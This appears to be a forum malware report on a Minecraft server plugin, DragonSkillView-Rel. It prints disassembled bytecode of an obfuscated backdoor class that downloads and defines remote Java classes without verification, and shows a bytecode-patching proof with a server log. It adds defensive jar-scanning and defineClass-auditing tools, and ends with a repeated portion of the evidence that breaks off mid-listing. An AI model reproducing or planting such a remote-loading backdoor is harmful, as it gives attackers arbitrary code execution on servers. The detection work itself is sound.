Reported thread: https://www.mcbbs.net/thread-1447913-1-1.html
Related discussion: https://www.mcbbs.net/forum.php? ... id=1450909#lastpost
Evidence:
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ grep ClassLoader -r .
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class: 匹配到二进制文件
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class: 匹配到二进制文件
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ javap -c ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class
Compiled from "fa"
public class seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi extends java.lang.ClassLoader {
public seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi(java.lang.String);
Code:
0: aload_0
1: invokespecial #16 // Method java/lang/ClassLoader."<init>":()V
4: aload_0
5: new #18 // class java/lang/StringBuilder
8: dup
9: invokespecial #19 // Method java/lang/StringBuilder."<init>":()V
12: iconst_0
13: ldc #21 // String \u001d\u007f\u0001{O$Z
15: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
18: invokevirtual #31 // Method java/lang/StringBuilder.insert:(ILjava/lang/String;)Ljava/lang/StringBuilder;
21: ldc #33 // String {\u0019~\u0012b\u001bT\u0016c\u0010h\u001e%\u001c{\u0010o\u0012%\u0016d\u0018
23: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
26: invokestatic #36 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.IiiiiiiIII:(Ljava/lang/String;)Ljava/lang/String;
29: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
32: ldc #42 // String O:F8C=Zm\u001cg\u0010xZ
34: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
37: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
40: getstatic #45 // Field seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.char:Ljava/lang/String;
43: ldc #47 // String _3&M
45: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
48: invokestatic #53 // Method java/net/URLEncoder.encode:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
51: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
54: ldc #55 // String Z
56: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
59: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
62: aload_1
63: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
66: invokevirtual #59 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
69: putfield #61 // Field extends:Ljava/lang/String;
72: return
73: athrow
74: astore_2
75: aload_2
76: invokevirtual #64 // Method java/io/UnsupportedEncodingException.printStackTrace:()V
79: return
Exception table:
from to target type
4 72 74 Class java/io/UnsupportedEncodingException
public java.lang.Class findClass(java.lang.String);
Code:
0: new #76 // class java/net/URL
3: dup
4: aload_0
5: getfield #61 // Field extends:Ljava/lang/String;
8: invokespecial #78 // Method java/net/URL."<init>":(Ljava/lang/String;)V
11: dup
12: astore_2
13: invokevirtual #82 // Method java/net/URL.openConnection:()Ljava/net/URLConnection;
16: checkcast #84 // class java/net/HttpURLConnection
19: dup
20: ldc #86 // String
22: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
25: getstatic #91 // Field seventeen/artist/rel/skillview/main/SkillViewRel/iIiIiIIIIi.iiIIiiiiIi:Ljava/lang/String;
28: invokevirtual #95 // Method java/net/HttpURLConnection.setRequestProperty:(Ljava/lang/String;Ljava/lang/String;)V
31: invokevirtual #99 // Method java/net/HttpURLConnection.getInputStream:()Ljava/io/InputStream;
34: astore_3
35: new #101 // class java/io/ByteArrayOutputStream
38: dup
39: invokespecial #102 // Method java/io/ByteArrayOutputStream."<init>":()V
42: astore 4
44: sipush 1024
47: newarray byte
49: iconst_1
50: dup
51: pop2
52: astore 5
54: iconst_0
55: istore 6
57: aload_3
58: aload 5
60: invokevirtual #108 // Method java/io/InputStream.read:([B)I
63: dup
64: istore 6
66: iconst_m1
67: if_icmpeq 85
70: aload_3
71: aload 4
73: aload 5
75: iconst_0
76: iload 6
78: invokevirtual #112 // Method java/io/ByteArrayOutputStream.write:([BII)V
81: goto 58
84: athrow
85: aload 4
87: invokevirtual #116 // Method java/io/ByteArrayOutputStream.toByteArray:()[B
90: astore 6
92: aload_0
93: aload_1
94: iconst_0
95: aload 6
97: dup_x1
98: arraylength
99: invokevirtual #120 // Method defineClass:(Ljava/lang/String;[BII)Ljava/lang/Class;
102: astore_3
103: aload_3
104: areturn
105: athrow
106: astore_2
107: aconst_null
108: aload_2
109: invokevirtual #121 // Method java/io/IOException.printStackTrace:()V
112: areturn
Exception table:
from to target type
0 84 106 Class java/io/IOException
85 104 106 Class java/io/IOException
}
Summary: this file downloads a Java class from the internet and loads it without any verification.
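The `grep ClassLoader -r .` triage above works, but a structural check is more reliable: the javap output shows the URL is assembled from string constants that are decoded at runtime through IIIIiiIIiI.instanceof, so grepping a jar for "http" finds nothing. The following is an added example, not code from the original post or from the reported plugin; it uses the same ASM library the post already uses, and the class and record names (LoaderTriage, Finding) are chosen here. It walks every class in a jar and reports the combination seen above: a ClassLoader subclass, a defineClass call, and java.net usage.

```java
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.Opcodes;
import org.objectweb.asm.tree.AbstractInsnNode;
import org.objectweb.asm.tree.ClassNode;
import org.objectweb.asm.tree.MethodInsnNode;
import org.objectweb.asm.tree.MethodNode;
import org.objectweb.asm.tree.TypeInsnNode;

import java.io.IOException;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.Enumeration;
import java.util.List;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

// Static triage of a plugin jar (added example; the names here are not from the
// reported plugin). Flags the remote-code-loading structure without relying on
// readable URL strings, which the obfuscator encrypts.
public class LoaderTriage {

    static final List<String> LOADER_SUPERS = List.of(
            "java/lang/ClassLoader", "java/security/SecureClassLoader", "java/net/URLClassLoader");

    record Finding(String className, boolean extendsClassLoader,
                   boolean callsDefineClass, List<String> networkRefs) {
        // Network bytes flowing into defineClass is the signature to act on.
        boolean remoteLoaderPattern() { return callsDefineClass && !networkRefs.isEmpty(); }
    }

    static Finding inspect(ClassNode node) {
        // superName is null for module-info and java/lang/Object, so guard the lookup
        boolean extendsLoader = node.superName != null && LOADER_SUPERS.contains(node.superName);
        boolean callsDefine = false;
        List<String> net = new ArrayList<>();
        for (MethodNode mn : node.methods) {
            for (AbstractInsnNode insn : mn.instructions) {
                if (insn instanceof MethodInsnNode mi) {
                    // defineClass is inherited, so the owner in bytecode is the plugin's
                    // own class (as in the javap above); match on the method name.
                    if (mi.name.equals("defineClass")) callsDefine = true;
                    if (mi.owner.startsWith("java/net/")) net.add(mi.owner + "." + mi.name);
                } else if (insn instanceof TypeInsnNode ti && ti.desc.startsWith("java/net/")) {
                    // new java/net/URL, checkcast java/net/HttpURLConnection, ...
                    net.add((ti.getOpcode() == Opcodes.NEW ? "new " : "cast ") + ti.desc);
                }
            }
        }
        return new Finding(node.name, extendsLoader, callsDefine, net);
    }

    static List<Finding> scanJar(String jarPath) throws IOException {
        List<Finding> findings = new ArrayList<>();
        try (JarFile jar = new JarFile(jarPath)) {
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (!entry.getName().endsWith(".class")) continue;
                try (InputStream in = jar.getInputStream(entry)) {
                    ClassNode node = new ClassNode();
                    new ClassReader(in).accept(node, ClassReader.SKIP_DEBUG | ClassReader.SKIP_FRAMES);
                    Finding f = inspect(node);
                    if (f.extendsClassLoader() || f.callsDefineClass()) findings.add(f);
                }
            }
        }
        return findings;
    }

    public static void main(String[] args) throws IOException {
        for (Finding f : scanJar(args[0])) {
            System.out.printf("%s%n  extends ClassLoader: %b%n  calls defineClass: %b%n  java.net refs: %s%n  %s%n",
                    f.className(), f.extendsClassLoader(), f.callsDefineClass(), f.networkRefs(),
                    f.remoteLoaderPattern() ? "!! remote code loading pattern" : "review manually");
        }
    }
}
```

Run it as `java -cp asm.jar:asm-tree.jar:. LoaderTriage plugin.jar`. A legitimate plugin that defines classes from a local file or a generated byte array will show `calls defineClass: true` with no java.net references, which is why the two signals are reported separately and only their combination is called out.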
To prove that this class is actually used, the class was bytecode-edited to insert a call to io.github.cavenightingale.Anchor.onClassLoaded; the program is as follows:
package io.github.cavenightingale;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.Opcodes;
import org.objectweb.asm.tree.*;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
public class Main {
    public static void main(String[] args) {
        // Read the original class and write the patched copy next to it as .class.1
        try (var is = new FileInputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class");
             var os = new FileOutputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class.1")) {
            ClassReader cr = new ClassReader(is);
            ClassNode node = new ClassNode();
            cr.accept(node, 0);
            for (var x : node.methods) {
                // The target was an angle-bracketed JVM method name (<init> or <clinit>); the forum rendering stripped it
                if (x instanceof MethodNode mn && mn.name.equals("")) {
                    // Insert a static call to the hook as the first instruction; it takes no
                    // arguments and returns void, so max stack and frames are unchanged
                    mn.instructions.insertBefore(mn.instructions.getFirst(), new MethodInsnNode(Opcodes.INVOKESTATIC, "io/github/cavenightingale/Anchor", "onClassLoaded", "()V"));
                }
            }
            ClassWriter cw = new ClassWriter(0);
            node.accept(cw);
            os.write(cw.toByteArray());
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
package io.github.cavenightingale;
public class Anchor {
    // Called from the patched class; the line appears in the server log if the class is ever used
    public static void onClassLoaded() {
        System.out.println("[CaveNightingale] Backdoor loaded!");
    }
}
Replace IIiIIiIiiI.class with IIiIIiIiiI.class.1, repackage the jar, and run it in an isolated environment:
Starting org.bukkit.craftbukkit.Main
System Info: Java 17 (OpenJDK 64-Bit Server VM 17.0.7+7-Ubuntu-0ubuntu123.04) Host: Linux 6.2.0-23-generic (amd64)
Loading libraries, please wait...
[14:54:58 INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[14:55:00 INFO]: Loaded 7 recipes
[14:55:00 INFO]: Starting minecraft server version 1.20.1
[14:55:00 INFO]: Loading properties
[14:55:01 INFO]: This server is running Paper version git-Paper-47 (MC: 1.20.1) (Implementing API version 1.20.1-R0.1-SNAPSHOT) (Git: aea9cdd)
[14:55:01 INFO]: Server Ping Player Sample Count: 12
[14:55:01 INFO]: Using 4 threads for Netty based IO
[14:55:01 WARN]: [!] The timings profiler has been enabled but has been scheduled for removal from Paper in the future.
We recommend installing the spark profiler as a replacement: https://spark.lucko.me/
For more information please visit: https://github.com/PaperMC/Paper/issues/8948
[14:55:01 INFO]: [ChunkTaskScheduler] Chunk system is using 1 I/O threads, 4 worker threads, and gen parallelism of 4 threads
[14:55:01 INFO]: Default game type: SURVIVAL
[14:55:01 INFO]: Generating keypair
[14:55:01 INFO]: Starting Minecraft server on *:25565
[14:55:01 INFO]: Using epoll channel type
[14:55:02 INFO]: Paper: Using libdeflate (Linux x86_64) compression from Velocity.
[14:55:02 INFO]: Paper: Using OpenSSL 3.0.x (Linux x86_64) cipher from Velocity.
[14:55:02 WARN]: [org.bukkit.craftbukkit.v1_20_R1.legacy.CraftLegacy] Initializing Legacy Material Support. Unless you have legacy plugins and/or data this is a bug!
[14:55:06 WARN]: Legacy plugin MCCore v1.67 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonCore v2.4.7 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin SkillAPI v3.108 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonSkillView-Rel v2.0.8 does not specify an api-version.
[14:55:06 INFO]: [PlaceholderAPI] Loading server plugin PlaceholderAPI v2.11.3
[14:55:06 INFO]: [MCCore] Loading server plugin MCCore v1.67
[14:55:06 INFO]: [DragonCore] Loading server plugin DragonCore v2.4.7
[14:55:06 INFO]: [SkillAPI] Loading server plugin SkillAPI v3.108
[14:55:06 INFO]: [DragonSkillView-Rel] Loading server plugin DragonSkillView-Rel v2.0.8
[14:55:06 INFO]: Server permissions file permissions.yml is empty, ignoring it
[14:55:06 INFO]: Preparing level "world"
[14:55:07 INFO]: Preparing start region for dimension minecraft:overworld
[14:55:07 INFO]: Time elapsed: 371 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_nether
[14:55:07 INFO]: Time elapsed: 55 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_end
[14:55:07 INFO]: Time elapsed: 59 ms
[14:55:07 INFO]: [PlaceholderAPI] Enabling PlaceholderAPI v2.11.3
[14:55:08 INFO]: [PlaceholderAPI] Fetching available expansion information...
[14:55:08 INFO]: [MCCore] Enabling MCCore v1.67*
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection - is the server using Cauldron/Thermos?
[14:55:08 WARN]: Nag author(s): '[Eniripsa96]' of 'MCCore v1.67' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection for scoreboards - restoring to slow method
[14:55:08 INFO]: [MCCore] Created a new folder for config files
[14:55:08 INFO]: [DragonCore] Enabling DragonCore v2.4.7*
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] 欢迎使用【龙之核心】,插件作者为QQ448780139
[14:55:08 INFO]: [DragonCore] 欢迎加入QQ交流群: 901704037
[14:55:08 INFO]: [DragonCore] 欢迎注册社区网站: https://dragoncore.top/
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] [STDOUT] NMS版本:net.minecraft.server.v1_20_R1
[14:55:08 WARN]: Nag author(s): '[]' of 'DragonCore v2.4.7' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 WARN]: java.lang.ClassNotFoundException: net.minecraft.server.v1_20_R1.ItemStack
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:183)
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:150)
[14:55:08 WARN]: at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:520)
[14:55:08 WARN]: at java.base/java.lang.Class.forName0(Native Method)
[14:55:08 WARN]: at java.base/java.lang.Class.forName(Class.java:375)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.util.NBTUtils.loadNBTUtils(NBTUtils.java:118)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.DragonCore.onEnable(DragonCore.java:50)
[14:55:08 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:08 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:08 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:08 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:08 INFO]: DragonCore - 开始载入文件
[14:55:08 INFO]: ┏━━━━━━━━━ 开始载入Yml文件 ━━━━━━━━━
[14:55:08 INFO]: ┃ 载入: WorldTexture.yml
[14:55:08 INFO]: ┃ 载入: SlotConfig.yml
[14:55:09 INFO]: ┃ 载入: KeyConfig.yml
[14:55:09 INFO]: ┃ 载入: ItemModel.yml
[14:55:09 INFO]: ┃ 载入: ItemIcon.yml
[14:55:09 INFO]: ┃ 载入: FontConfig.yml
[14:55:09 INFO]: ┃ 载入: EntityModel.yml
[14:55:09 INFO]: ┃ 载入: config.yml
[14:55:09 INFO]: ┃ 载入: Blood.yml
[14:55:09 INFO]: ┃ 载入: ArmorLayer.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/通用.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/用于显示Gui界面的Tip.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/书本.yml
[14:55:09 INFO]: ┃ 载入: Gui/自动滚动公告.yml
[14:55:09 INFO]: ┃ 载入: Gui/背包.yml
[14:55:09 INFO]: ┃ 载入: Gui/huds.yml
[14:55:09 INFO]: ┖━━━━━━━━━━ 文件载入完成 ━━━━━━━━━━━
[14:55:09 INFO]: 已启用YML格式存储玩家数据
[14:55:09 INFO]: DragonCore - 加载完成
[14:55:09 INFO]: [SkillAPI] Enabling SkillAPI v3.108*
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: Registration complete
[14:55:09 INFO]: - 0 skills
[14:55:09 INFO]: - 0 classes
[14:55:09 WARN]: java.lang.NullPointerException: Cannot invoke "java.lang.Class.getDeclaredField(String)" because "living" is null
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.listener.KillListener.(KillListener.java:68)
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.SkillAPI.onEnable(SkillAPI.java:162)
[14:55:09 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:09 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:09 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:09 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:09 INFO]: [DragonSkillView-Rel] Enabling DragonSkillView-Rel v2.0.8*
[14:55:09 INFO]: [DragonSkillView-Rel] [STDOUT] [CaveNightingale] Backdoor loaded!
[14:55:09 WARN]: Nag author(s): '[17Artist]' of 'DragonSkillView-Rel v2.0.8' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:10 INFO]: ┏━━━━━━━━━ 鉴权失败 ━━━━━━━━━
[14:55:10 INFO]: ┃ 失败: 激活码有误,请检查
[14:55:10 INFO]: ┃ 插件名: 龙之技能栏
[14:55:10 INFO]: ┖━━━━━━━━━━ 鉴权失败 ━━━━━━━━━━━
[14:55:10 INFO]: [PlaceholderAPI] Placeholder expansion registration initializing...
[14:55:10 INFO]: Running delayed init tasks
[14:55:10 INFO]: 0 placeholder hook(s) registered!
[14:55:10 INFO]: Done (9.372s)! For help, type "help"
[14:55:10 INFO]: Timings Reset
[14:55:13 INFO]: ┏━━━━━━━━━ 鉴权失败 ━━━━━━━━━
[14:55:13 INFO]: ┃ 失败: 验证失败,请检查激活码,是否填写正确。
[14:55:13 INFO]: ┃ 插件名: 龙之技能栏
[14:55:13 INFO]: ┖━━━━━━━━━━ 鉴权失败 ━━━━━━━━━━━
>
> stop
[14:55:59 INFO]: Stopping the server
[14:55:59 INFO]: Stopping server
[14:55:59 INFO]: [DragonSkillView-Rel] Disabling DragonSkillView-Rel v2.0.8
[14:55:59 INFO]: [SkillAPI] Disabling SkillAPI v3.108
[14:55:59 INFO]: [DragonCore] Disabling DragonCore v2.4.7
[14:55:59 INFO]: [MCCore] Disabling MCCore v1.67
[14:55:59 INFO]: [PlaceholderAPI] Disabling PlaceholderAPI v2.11.3
[14:55:59 INFO]: Saving players
[14:55:59 INFO]: Saving worlds
[14:55:59 INFO]: Saving chunks for level 'ServerLevel[world]'/minecraft:overworld
[14:55:59 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Halted chunk system for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world'
[14:56:01 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world' in 1.82s
[14:56:01 INFO]: ThreadedAnvilChunkStorage (world): All chunks are saved
[14:56:01 INFO]: Saving chunks for level 'ServerLevel[world_nether]'/minecraft:the_nether
[14:56:01 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_nether'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_nether' in 1.01s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM-1): All chunks are saved
[14:56:02 INFO]: Saving chunks for level 'ServerLevel[world_the_end]'/minecraft:the_end
[14:56:02 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_the_end' in 0.15s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM1): All chunks are saved
[14:56:02 INFO]: ThreadedAnvilChunkStorage: All dimensions are saved
[14:56:02 INFO]: Flushing Chunk IO
[14:56:02 INFO]: Closing Thread Pool
> 2023-06-24 14:56:02,888 Log4j2-AsyncAppenderEventDispatcher-1-Async WARN Advanced terminal features are not available in this environment
[14:56:02 INFO]: Closing Server
This proves that the class is indeed used while the plugin runs.
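The bytecode patch above proves one specific class runs. The same sandbox run can answer the more general question, which class gets defined from the downloaded bytes and which plugin method asked for it, without editing the plugin at all, because every defineClass call passes through any registered ClassFileTransformer. The following Java agent is an added example, not part of the original post; DefineClassAuditAgent and Auditor are names chosen here. It assumes the observation that ClassLoader.defineClass(String, byte[], int, int) uses the loader's default ProtectionDomain, whose CodeSource has a null location, while classes loaded from a plugin jar carry the jar's URL.

```java
import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.Instrumentation;
import java.security.CodeSource;
import java.security.ProtectionDomain;

// Added example (not from the original post): reports every class definition
// whose bytes are not backed by a jar or directory on disk. Attach it to the
// sandboxed server with -javaagent to see dynamic definitions as they happen.
public class DefineClassAuditAgent {

    public static void premain(String agentArgs, Instrumentation inst) {
        inst.addTransformer(new Auditor());
    }

    // A definition is reported when a non-JDK loader supplies bytes with no
    // code-source location. JDK-internal loaders (e.g. generated reflection
    // accessors) are skipped to cut noise; a plugin's own loader class such as
    // the seventeen.* one in the javap above is never skipped.
    static boolean isUnbacked(ClassLoader loader, ProtectionDomain pd) {
        if (loader == null) return false;                        // bootstrap classes
        if (loader.getClass().getName().startsWith("jdk.internal.")) return false;
        if (pd == null) return true;
        CodeSource cs = pd.getCodeSource();
        return cs == null || cs.getLocation() == null;
    }

    static final class Auditor implements ClassFileTransformer {
        @Override
        public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined,
                                ProtectionDomain pd, byte[] classfileBuffer) {
            if (classBeingRedefined == null && isUnbacked(loader, pd)) {
                System.err.printf("[defineClass-audit] %s (%d bytes) defined by %s with no on-disk code source%n",
                        className, classfileBuffer.length, loader.getClass().getName());
                // The transformer runs inside defineClass, so this stack trace names the
                // plugin method that performed the definition.
                new Throwable("definition site").printStackTrace();
            }
            return null; // never modify the bytes; this agent only observes
        }
    }
}
```

Package it in a jar whose manifest contains `Premain-Class: DefineClassAuditAgent` and start the sandbox with `java -javaagent:audit.jar -jar paper.jar`. Lambdas and hidden classes are not passed to transformers, so they never appear, which is fine for this purpose: a class arriving over HTTP, as in the findClass method above, is defined through the ordinary defineClass path and is reported together with the calling frames.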
相关讨论:https://www.mcbbs.net/forum.php? ... id=1450909#lastpost
证据:
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ grep ClassLoader -r .
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class: 匹配到二进制文件
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class: 匹配到二进制文件
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ javap -c ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class
Compiled from "fa"
public class seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi extends java.lang.ClassLoader {
public seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi(java.lang.String);
Code:
0: aload_0
1: invokespecial #16 // Method java/lang/ClassLoader."":()V
4: aload_0
5: new #18 // class java/lang/StringBuilder
8: dup
9: invokespecial #19 // Method java/lang/StringBuilder."":()V
12: iconst_0
13: ldc #21 // String \u001d\u007f\u0001{O$Z
15: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
18: invokevirtual #31 // Method java/lang/StringBuilder.insert:(ILjava/lang/String;)Ljava/lang/StringBuilder;
21: ldc #33 // String {\u0019~\u0012b\u001bT\u0016c\u0010h\u001e%\u001c{\u0010o\u0012%\u0016d\u0018
23: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
26: invokestatic #36 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.IiiiiiiIII:(Ljava/lang/String;)Ljava/lang/String;
29: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
32: ldc #42 // String O:F8C=Zm\u001cg\u0010xZ
34: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
37: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
40: getstatic #45 // Field seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.char:Ljava/lang/String;
43: ldc #47 // String _3&M
45: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
48: invokestatic #53 // Method java/net/URLEncoder.encode:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
51: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
54: ldc #55 // String Z
56: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
59: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
62: aload_1
63: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
66: invokevirtual #59 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
69: putfield #61 // Field extends:Ljava/lang/String;
72: return
73: athrow
74: astore_2
75: aload_2
76: invokevirtual #64 // Method java/io/UnsupportedEncodingException.printStackTrace:()V
79: return
Exception table:
from to target type
4 72 74 Class java/io/UnsupportedEncodingException
public java.lang.Class findClass(java.lang.String);
Code:
0: new #76 // class java/net/URL
3: dup
4: aload_0
